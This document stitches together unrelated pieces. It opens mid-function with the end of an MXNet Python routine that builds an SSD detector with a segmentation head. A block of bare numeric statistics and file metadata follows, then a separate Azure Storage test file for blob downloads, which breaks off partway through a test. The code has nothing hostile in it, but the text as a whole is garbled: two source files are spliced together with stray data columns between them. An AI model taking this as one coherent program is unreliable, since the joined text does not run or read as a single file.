        feature layers; index 0 (res3 level) feeds only the segmentation
        head, the remainder feed the SSD branch ('' entries add extra
        layers on top of the last named layer)
    num_filters, strides, pads : list of int
        extra-layer conv configuration, -1 for extracted layers
    sizes, ratios : list or list of list
        anchor sizes/ratios per detection layer
    normalizations : int or list of int
        per-layer normalization scales, -1 to disable
    steps : list
        explicit MultiBoxPrior steps; empty to infer from layer dimensions
    min_filter : int
        minimum number of filters used in 1x1 convolution
    nms_thresh : float
        non-maximum suppression threshold
    force_suppress : boolean
        whether suppress different class objects
    nms_topk : int
        apply NMS to top K detections

    Returns
    -------
    mx.Symbol
        group of [detection, seg_out]
    """
    body = import_module(network).get_symbol(num_classes, **kwargs)
    internals = body.get_internals()
    res3 = internals[from_layers[0] + "_output"]
    res4 = internals[from_layers[1] + "_output"]
    conv_feat = internals[from_layers[2] + "_output"]
    # res3 is used only by the segmentation head, so drop it (and its
    # per-layer configuration) from the SSD inputs.
    from_layers = from_layers[1:]
    num_filters = num_filters[1:]
    strides = strides[1:]
    pads = pads[1:]
    sizes = sizes[1:]
    ratios = ratios[1:]
    layers = multi_layer_feature(body, from_layers, num_filters, strides, pads,
                                 min_filter=min_filter)
    loc_preds, cls_preds, anchor_boxes = multitask_layer(
        layers, num_classes, sizes=sizes, ratios=ratios, normalization=normalizations,
        num_channels=num_filters, clip=False, interm_layer=0, steps=steps)
    cls_prob = mx.symbol.SoftmaxActivation(data=cls_preds, mode='channel',
                                           name='cls_prob')
    det = mx.contrib.symbol.MultiBoxDetection(*[cls_prob, loc_preds, anchor_boxes],
                                              name="detection", nms_threshold=nms_thresh,
                                              force_suppress=force_suppress,
                                              variances=(0.1, 0.1, 0.2, 0.2), nms_topk=nms_topk)
    # --- segmentation head (pyramid pooling module) ---
    res3_block = mx.sym.BlockGrad(data=res3, name="res3_block")
    res3_reduced = mx.sym.Convolution(data=res3_block, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                      num_filter=128, no_bias=True, workspace=1024, name="res3_reduced")
    res3_reduced_bn = mx.sym.BatchNorm(data=res3_reduced, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='res3_reduced_bn')
    res3_reduced2 = mx.sym.Convolution(data=res3_reduced_bn, kernel=(3, 3), stride=(1, 1), pad=(1, 1),
                                       num_filter=128, no_bias=True, workspace=1024, name="res3_reduced2")
    res3_reduced2_bn = mx.sym.BatchNorm(data=res3_reduced2, fix_gamma=True, eps=eps,
                                        use_global_stats=use_global_stats, name='res3_reduced2_bn')
    res4_block = mx.sym.BlockGrad(data=res4, name="res4_block")
    res4_reduced = mx.sym.Convolution(data=res4_block, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                      num_filter=256, no_bias=True, workspace=1024, name="res4_reduced")
    res4_reduced_bn = mx.sym.BatchNorm(data=res4_reduced, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='res4_reduced_bn')
    res4_reduced2 = mx.sym.Convolution(data=res4_reduced_bn, kernel=(3, 3), stride=(1, 1), pad=(1, 1),
                                       num_filter=256, no_bias=True, workspace=1024, name="res4_reduced2")
    res4_reduced2_bn = mx.sym.BatchNorm(data=res4_reduced2, fix_gamma=True, eps=eps,
                                        use_global_stats=use_global_stats, name='res4_reduced2_bn')
    res5_reduced = mx.symbol.Convolution(data=conv_feat, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                         num_filter=512, no_bias=True, workspace=1024, name="res5_reduced")
    # BUG FIX: previously BatchNorm normalized ``conv_feat`` directly,
    # leaving the res5_reduced 1x1 projection unused.  Old checkpoints will
    # not load against the corrected parameter shapes.
    res5_reduced_bn = mx.sym.BatchNorm(data=res5_reduced, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='res5_reduced_bn')
    # Average-pool the res5-level features at three scales (1x, 1/2, 1/4).
    score_pool1 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(1, 1), stride=(1, 1),
                                 pad=(0, 0), pool_type='avg', name='score_pool1')
    score_pool2 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(2, 2), stride=(2, 2),
                                 pad=(0, 0), pool_type='avg', name='score_pool2')
    score_pool4 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(4, 4), stride=(4, 4),
                                 pad=(0, 0), pool_type='avg', name='score_pool4')
    score2_pool4 = mx.symbol.Convolution(data=score_pool4, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                         num_filter=128, no_bias=True, workspace=1024, name="score2_pool4")
    score2_pool4_bn = mx.sym.BatchNorm(data=score2_pool4, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='score2_pool4_bn')
    score2_pool2 = mx.symbol.Convolution(data=score_pool2, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                         num_filter=256, no_bias=True, workspace=1024, name="score2_pool2")
    score2_pool2_bn = mx.sym.BatchNorm(data=score2_pool2, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='score2_pool2_bn')
    score2_pool1 = mx.symbol.Convolution(data=score_pool1, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                         num_filter=512, no_bias=True, workspace=1024, name="score2_pool1")
    score2_pool1_bn = mx.sym.BatchNorm(data=score2_pool1, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='score2_pool1_bn')
    # Resample every branch onto a fixed 64x128 grid before concatenation.
    affine_matrix = mx.sym.var("affine_matrix", shape=(1, 6))
    grid = mx.sym.GridGenerator(data=affine_matrix, transform_type='affine', target_shape=(64, 128))
    score3_samp4 = mx.sym.BilinearSampler(data=score2_pool4_bn, grid=grid, name='score3_samp4')
    score3_samp2 = mx.sym.BilinearSampler(data=score2_pool2_bn, grid=grid, name='score3_samp2')
    score3_samp1 = mx.sym.BilinearSampler(data=score2_pool1_bn, grid=grid, name='score3_samp1')
    score3_sampy = mx.sym.BilinearSampler(data=res5_reduced_bn, grid=grid, name='score3_sampy')
    score3_samp0 = mx.sym.BilinearSampler(data=res4_reduced2_bn, grid=grid, name='score3_samp0')
    score3_sampx = mx.sym.BilinearSampler(data=res3_reduced2_bn, grid=grid, name='score3_sampx')
    score3_concat = mx.sym.concat(score3_samp4, score3_samp2, score3_samp1, score3_sampy,
                                  score3_samp0, score3_sampx, dim=1, name='score3_concat')
    score3_conv = mx.symbol.Convolution(data=score3_concat, kernel=(3, 3), stride=(1, 1), pad=(1, 1),
                                        num_filter=seg_classes, no_bias=True, workspace=1024, name="score3_conv")
    score3_conv_bn = mx.sym.BatchNorm(data=score3_conv, fix_gamma=True, eps=eps,
                                      use_global_stats=use_global_stats, name='score3_conv_bn')
    # Learned 2x upsampling back toward input resolution.
    score4_conv = mx.symbol.Deconvolution(data=score3_conv_bn, kernel=(4, 4), stride=(2, 2), pad=(1, 1),
                                          num_filter=seg_classes, workspace=1024, name="score4_conv")
    # NOTE(review): ``multi_output`` is not a documented mx.sym.softmax
    # argument (it belongs to SoftmaxOutput); kept as-is — confirm against
    # the pinned MXNet version.
    fcnxs = mx.symbol.softmax(data=score4_conv, multi_output=True, name="seg_out")
    # group output
    out = mx.symbol.Group([det, fcnxs])
    return out
| 54.737276
| 146
| 0.691159
| 5,782
| 39,794
| 4.539606
| 0.045313
| 0.021144
| 0.038936
| 0.016763
| 0.982018
| 0.981027
| 0.981027
| 0.97977
| 0.97977
| 0.97977
| 0
| 0.04832
| 0.178293
| 39,794
| 726
| 147
| 54.812672
| 0.754396
| 0.279263
| 0
| 0.940171
| 0
| 0
| 0.075654
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019943
| false
| 0
| 0.037037
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2240cf28d0f34b7f8a953e0e98a9d8138d1e0eeb
| 39,253
|
py
|
Python
|
sdk/storage/azure-storage-blob/tests/test_get_blob.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1
|
2021-04-26T21:15:01.000Z
|
2021-04-26T21:15:01.000Z
|
sdk/storage/azure-storage-blob/tests/test_get_blob.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2
|
2021-08-24T15:32:30.000Z
|
2021-08-24T23:21:34.000Z
|
sdk/storage/azure-storage-blob/tests/test_get_blob.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1
|
2016-04-19T22:15:47.000Z
|
2016-04-19T22:15:47.000Z
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import pytest
import base64
import unittest
import uuid
from os import path, remove, sys, urandom
from azure.core.exceptions import HttpResponseError
from devtools_testutils import ResourceGroupPreparer, StorageAccountPreparer
from azure.storage.blob import (
BlobServiceClient,
ContainerClient,
BlobClient,
StorageErrorCode,
BlobProperties
)
from _shared.testcase import GlobalStorageAccountPreparer
from devtools_testutils.storage import StorageTestCase
# ------------------------------------------------------------------------------
TEST_BLOB_PREFIX = 'blob'
# ------------------------------------------------------------------------------
class StorageGetBlobTest(StorageTestCase):
def _setup(self, storage_account, key):
# test chunking functionality by reducing the threshold
# for chunking and the size of each chunk, otherwise
# the tests would take too long to execute
self.bsc = BlobServiceClient(
self.account_url(storage_account, "blob"),
credential=key,
max_single_get_size=1024,
max_chunk_get_size=1024)
self.config = self.bsc._config
self.container_name = self.get_resource_name('utcontainer')
if self.is_live:
container = self.bsc.get_container_client(self.container_name)
try:
container.create_container()
except:
pass
self.byte_blob = self.get_resource_name('byteblob')
self.byte_data = self.get_random_bytes(64 * 1024 + 5)
if self.is_live:
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
blob.upload_blob(self.byte_data, overwrite=True)
def _teardown(self, file_name):
if path.isfile(file_name):
try:
remove(file_name)
except:
pass
# --Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name(TEST_BLOB_PREFIX)
class NonSeekableFile(object):
def __init__(self, wrapped_file):
self.wrapped_file = wrapped_file
def write(self, data):
self.wrapped_file.write(data)
def read(self, count):
return self.wrapped_file.read(count)
def seekable(self):
return False
# -- Get test cases for blobs ----------------------------------------------
@GlobalStorageAccountPreparer()
def test_unicode_get_blob_unicode_data(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_data = u'hello world啊齄丂狛狜'.encode('utf-8')
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(blob_data)
# Act
content = blob.download_blob()
# Assert
self.assertIsInstance(content.properties, BlobProperties)
self.assertEqual(content.readall(), blob_data)
@GlobalStorageAccountPreparer()
def test_unicode_get_blob_binary_data(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
base64_data = 'AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/w=='
binary_data = base64.b64decode(base64_data)
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(binary_data)
# Act
content = blob.download_blob()
# Assert
self.assertIsInstance(content.properties, BlobProperties)
self.assertEqual(content.readall(), binary_data)
@GlobalStorageAccountPreparer()
def test_get_blob_no_content(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_data = b''
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(blob_data)
# Act
content = blob.download_blob()
# Assert
self.assertEqual(blob_data, content.readall())
self.assertEqual(0, content.properties.size)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_bytes(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
# Act
content = blob.download_blob(max_concurrency=2).readall()
# Assert
self.assertEqual(self.byte_data, content)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_bytes_with_single_byte(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
# Act
content = blob.download_blob(offset=0, length=1).readall()
# Assert
self.assertEqual(1, len(content))
self.assertEqual(self.byte_data[0], content[0])
# Act
content = blob.download_blob(offset=5, length=1).readall()
# Assert
self.assertEqual(1, len(content))
self.assertEqual(self.byte_data[5], content[0])
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_bytes_with_zero_byte(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_data = b''
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(blob_data)
# Act
# the get request should fail in this case since the blob is empty and yet there is a range specified
with self.assertRaises(HttpResponseError) as e:
blob.download_blob(offset=0, length=5)
self.assertEqual(StorageErrorCode.invalid_range, e.exception.error_code)
with self.assertRaises(HttpResponseError) as e:
blob.download_blob(offset=3, length=5)
self.assertEqual(StorageErrorCode.invalid_range, e.exception.error_code)
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_with_missing_start_range(self, resource_group, location, storage_account, storage_account_key):
self._setup(storage_account, storage_account_key)
blob_data = b'foobar'
blob_name = self._get_blob_reference()
blob = self.bsc.get_blob_client(self.container_name, blob_name)
blob.upload_blob(blob_data)
# Act
# the get request should fail fast in this case since start_range is missing while end_range is specified
with self.assertRaises(ValueError):
blob.download_blob(length=3)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_bytes_snapshot(self, resource_group, location, storage_account, storage_account_key):
# parallel tests introduce random order of requests, can only run live
self._setup(storage_account, storage_account_key)
blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)
snapshot_ref = blob.create_snapshot()
snapshot = self.bsc.get_blob_client(self.container_name, self.byte_blob, snapshot=snapshot_ref)
blob.upload_blob(self.byte_data, overwrite=True) # Modify the blob so the Etag no longer matches
# Act
content = snapshot.download_blob(max_concurrency=2).readall()
# Assert
self.assertEqual(self.byte_data, content)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_bytes_with_progress(self, resource_group, location, storage_account, storage_account_key):
    """Parallel full download reports per-request progress via raw_response_hook."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    progress = []
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    # Act
    content = blob.download_blob(raw_response_hook=callback, max_concurrency=2).readall()

    # Assert
    self.assertEqual(self.byte_data, content)
    self.assert_download_progress(
        len(self.byte_data),
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
@GlobalStorageAccountPreparer()
def test_get_blob_to_bytes_non_parallel(self, resource_group, location, storage_account, storage_account_key):
    """Sequential (max_concurrency=1) full download with progress reporting."""
    self._setup(storage_account, storage_account_key)
    progress = []
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    # Act
    content = blob.download_blob(raw_response_hook=callback, max_concurrency=1).readall()

    # Assert
    self.assertEqual(self.byte_data, content)
    self.assert_download_progress(
        len(self.byte_data),
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
@GlobalStorageAccountPreparer()
def test_get_blob_to_bytes_small(self, resource_group, location, storage_account, storage_account_key):
    """A small (1 KiB) blob downloads in a single GET with correct progress."""
    self._setup(storage_account, storage_account_key)
    blob_data = self.get_random_bytes(1024)
    blob_name = self._get_blob_reference()
    blob = self.bsc.get_blob_client(self.container_name, blob_name)
    blob.upload_blob(blob_data)
    progress = []

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    # Act
    content = blob.download_blob(raw_response_hook=callback).readall()

    # Assert
    self.assertEqual(blob_data, content)
    self.assert_download_progress(
        len(blob_data),
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_stream(self, resource_group, location, storage_account, storage_account_key):
    """readinto() a file stream writes the whole blob and returns its byte count."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)

    # Act
    FILE_PATH = 'get_blob_to_streamm.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        downloader = blob.download_blob(max_concurrency=2)
        read_bytes = downloader.readinto(stream)

    # Assert
    self.assertEqual(read_bytes, len(self.byte_data))
    with open(FILE_PATH, 'rb') as stream:
        actual = stream.read()
        self.assertEqual(self.byte_data, actual)
    self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_stream_with_progress(self, resource_group, location, storage_account, storage_account_key):
    """Parallel download to a file stream with progress reporting."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    progress = []
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    # Act
    FILE_PATH = 'blob_to_stream_with_progress.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        downloader = blob.download_blob(raw_response_hook=callback, max_concurrency=2)
        read_bytes = downloader.readinto(stream)

    # Assert
    self.assertEqual(read_bytes, len(self.byte_data))
    with open(FILE_PATH, 'rb') as stream:
        actual = stream.read()
        self.assertEqual(self.byte_data, actual)
    self.assert_download_progress(
        len(self.byte_data),
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
    self._teardown(FILE_PATH)
@GlobalStorageAccountPreparer()
def test_get_blob_to_stream_non_parallel(self, resource_group, location, storage_account, storage_account_key):
    """Sequential download to a file stream with progress reporting."""
    self._setup(storage_account, storage_account_key)
    progress = []
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    # Act
    FILE_PATH = 'stream_non_parallel.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        downloader = blob.download_blob(raw_response_hook=callback, max_concurrency=1)
        read_bytes = downloader.readinto(stream)

    # Assert
    self.assertEqual(read_bytes, len(self.byte_data))
    with open(FILE_PATH, 'rb') as stream:
        actual = stream.read()
        self.assertEqual(self.byte_data, actual)
    self.assert_download_progress(
        len(self.byte_data),
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
    self._teardown(FILE_PATH)
@GlobalStorageAccountPreparer()
def test_get_blob_to_stream_small(self, resource_group, location, storage_account, storage_account_key):
    """A small (1 KiB) blob downloads to a file stream in a single GET."""
    self._setup(storage_account, storage_account_key)
    blob_data = self.get_random_bytes(1024)
    blob_name = self._get_blob_reference()
    blob = self.bsc.get_blob_client(self.container_name, blob_name)
    blob.upload_blob(blob_data)
    progress = []

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    # Act
    FILE_PATH = 'blob_to_stream_small.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        downloader = blob.download_blob(raw_response_hook=callback, max_concurrency=2)
        read_bytes = downloader.readinto(stream)

    # Assert
    self.assertEqual(read_bytes, 1024)
    with open(FILE_PATH, 'rb') as stream:
        actual = stream.read()
        self.assertEqual(blob_data, actual)
    self.assert_download_progress(
        len(blob_data),
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
    self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_path(self, resource_group, location, storage_account, storage_account_key):
    """Ranged parallel download to a file returns exactly the requested slice."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)

    # Act
    FILE_PATH = 'get_blob_to_path.temp.{}.dat'.format(str(uuid.uuid4()))
    end_range = self.config.max_single_get_size
    with open(FILE_PATH, 'wb') as stream:
        downloader = blob.download_blob(offset=1, length=end_range - 1, max_concurrency=2)
        read_bytes = downloader.readinto(stream)

    # Assert
    self.assertEqual(read_bytes, end_range - 1)
    with open(FILE_PATH, 'rb') as stream:
        actual = stream.read()
        self.assertEqual(self.byte_data[1:end_range], actual)
    self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_path_with_progress(self, resource_group, location, storage_account, storage_account_key):
    """Ranged parallel download spanning the single-get threshold reports progress."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    progress = []
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)

    def callback(response):
        # record (bytes downloaded so far, total bytes) per response
        current = response.context['download_stream_current']
        total = response.context['data_stream_total']
        progress.append((current, total))

    # Act
    start_range = 3
    # length larger than max_single_get_size forces chunked (parallel) download
    end_range = self.config.max_single_get_size + 1024
    FILE_PATH = 'blob_to_path_with_progress.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        downloader = blob.download_blob(
            offset=start_range,
            length=end_range,
            raw_response_hook=callback,
            max_concurrency=2)
        read_bytes = downloader.readinto(stream)

    # Assert
    self.assertEqual(read_bytes, end_range)
    with open(FILE_PATH, 'rb') as stream:
        actual = stream.read()
        self.assertEqual(self.byte_data[start_range:end_range + start_range], actual)
    self.assert_download_progress(
        end_range,
        self.config.max_chunk_get_size,
        self.config.max_single_get_size,
        progress)
    self._teardown(FILE_PATH)
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_path_small(self, resource_group, location, storage_account, storage_account_key):
    """A tiny ranged download (4 bytes) lands in a single GET."""
    self._setup(storage_account, storage_account_key)
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)

    # Act
    FILE_PATH = 'blob_to_path_small.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        downloader = blob.download_blob(offset=1, length=4, max_concurrency=2)
        read_bytes = downloader.readinto(stream)

    # Assert
    self.assertEqual(read_bytes, 4)
    with open(FILE_PATH, 'rb') as stream:
        actual = stream.read()
        self.assertEqual(self.byte_data[1:5], actual)
    self._teardown(FILE_PATH)
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_path_non_parallel(self, resource_group, location, storage_account, storage_account_key):
    """A tiny ranged download with max_concurrency=1 (sequential path)."""
    self._setup(storage_account, storage_account_key)
    blob = self.bsc.get_blob_client(self.container_name, self.byte_blob)

    # Act
    FILE_PATH = 'blob_to_path_non_parallel.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        downloader = blob.download_blob(offset=1, length=3, max_concurrency=1)
        read_bytes = downloader.readinto(stream)

    # Assert
    self.assertEqual(read_bytes, 3)
    with open(FILE_PATH, 'rb') as stream:
        actual = stream.read()
        self.assertEqual(self.byte_data[1:4], actual)
    self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_path_invalid_range_parallel(self, resource_group, location, storage_account, storage_account_key):
    """A range extending past the end of the blob is truncated to the blob size."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    blob_size = self.config.max_single_get_size + 1
    blob_data = self.get_random_bytes(blob_size)
    blob_name = self._get_blob_reference()
    blob = self.bsc.get_blob_client(self.container_name, blob_name)
    blob.upload_blob(blob_data)

    # Act
    # deliberately request far more than the blob contains
    end_range = 2 * self.config.max_single_get_size
    FILE_PATH = 'path_invalid_range_parallel.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        downloader = blob.download_blob(offset=1, length=end_range, max_concurrency=2)
        read_bytes = downloader.readinto(stream)

    # Assert
    self.assertEqual(read_bytes, blob_size)
    with open(FILE_PATH, 'rb') as stream:
        actual = stream.read()
        self.assertEqual(blob_data[1:blob_size], actual)
    self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_ranged_get_blob_to_path_invalid_range_non_parallel(self, resource_group, location, storage_account, storage_account_key):
    """A range extending past the end of the blob is truncated to the blob size
    when downloading sequentially (max_concurrency=1)."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    blob_size = 1024
    blob_data = self.get_random_bytes(blob_size)
    blob_name = self._get_blob_reference()
    blob = self.bsc.get_blob_client(self.container_name, blob_name)
    blob.upload_blob(blob_data)

    # Act
    # deliberately request far more than the blob contains
    end_range = 2 * self.config.max_single_get_size
    FILE_PATH = 'invalid_range_non_parallel.temp.{}.dat'.format(str(uuid.uuid4()))
    with open(FILE_PATH, 'wb') as stream:
        # max_concurrency=1: this test is the sequential counterpart of
        # test_ranged_get_blob_to_path_invalid_range_parallel; it previously
        # used max_concurrency=2, which merely duplicated the parallel case.
        downloader = blob.download_blob(offset=1, length=end_range, max_concurrency=1)
        read_bytes = downloader.readinto(stream)

    # Assert
    self.assertEqual(read_bytes, blob_size)
    with open(FILE_PATH, 'rb') as stream:
        actual = stream.read()
        self.assertEqual(blob_data[1:blob_size], actual)
    self._teardown(FILE_PATH)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_text(self, resource_group, location, storage_account, storage_account_key):
    """Parallel download with encoding='UTF-8' decodes the blob back to str."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    text_blob = self.get_resource_name('textblob')
    # larger than max_single_get_size so a chunked download is exercised
    text_data = self.get_random_text_data(self.config.max_single_get_size + 1)
    blob = self.bsc.get_blob_client(self.container_name, text_blob)
    blob.upload_blob(text_data)

    # Act
    stream = blob.download_blob(max_concurrency=2, encoding='UTF-8')
    content = stream.readall()

    # Assert
    self.assertEqual(text_data, content)
@pytest.mark.live_test_only
@GlobalStorageAccountPreparer()
def test_get_blob_to_text_with_progress(self, resource_group, location, storage_account, storage_account_key):
    """Parallel text download reports progress against the UTF-8 byte length."""
    # parallel tests introduce random order of requests, can only run live
    self._setup(storage_account, storage_account_key)
    text_blob = self.get_resource_name('textblob')
